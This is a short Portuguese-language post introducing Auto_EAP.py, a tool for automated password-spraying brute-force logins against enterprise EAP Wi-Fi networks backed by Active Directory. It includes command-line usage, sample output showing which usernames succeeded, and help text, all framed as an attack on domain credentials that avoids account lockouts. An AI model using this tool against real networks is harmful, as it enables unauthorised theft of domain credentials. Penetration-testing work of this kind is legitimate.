
Ataques de login automatizados por força bruta contra redes EAP.
######Publicado em 15 de Setembro de 2016
Auto_EAP.py é um script projetado para realizar ataques automatizados de autenticação por força bruta contra vários tipos de redes EAP. Esses tipos de redes sem fio fornecem uma interface para facilitar a adivinhação de senhas de credenciais de domínio, já que os servidores radius verificam a autenticação contra o Active Directory. Usando a biblioteca Python wpaspy, criada por Jouni Malinen [email protected] para interagir com o daemon wpa_supplicant, ataques de autenticação automatizados podem ser realizados com a intenção de não causar bloqueios de conta.
./Auto_EAP.py -s HoneyPot -K WPA-EAP -E PEAP -U test.txt -p Summer2016 -i wlan0
Initialized...
Trying Username Alice with Password test: SUCCESS
Trying Username Bob with Password test: FAILED
Trying Username Charles with Password test: FAILED
Trying Username David with Password test: SUCCESS
Completed
Execute 'RunMeFirst.py' no diretório raiz do Auto_EAP. Isso irá compilar a biblioteca wpaspy, bem como configurar um arquivo wpa_supplicant.conf independente que o Auto_EAP.py usará para testes, deixando o arquivo de configuração do wpa_supplicant do sistema intocado.
./Auto_EAP.py -h
usage: Auto_EAP.py [-h] -i Interface -s SSID -U Usernamefile -p Password -K
Key_mgmt -E Eap_type
optional arguments:
-h, --help show this help message and exit
-i Interface, --interface Interface
The Interface to use
-s SSID, --ssid SSID The SSID to attack
-U Usernamefile, --User Usernamefile
Path to username file
-p Password, --password Password
Password to use
-K Key_mgmt, --key_mgmt Key_mgmt
Key_Management type to use
-E Eap_type, --eap_type Eap_type
Eap type to use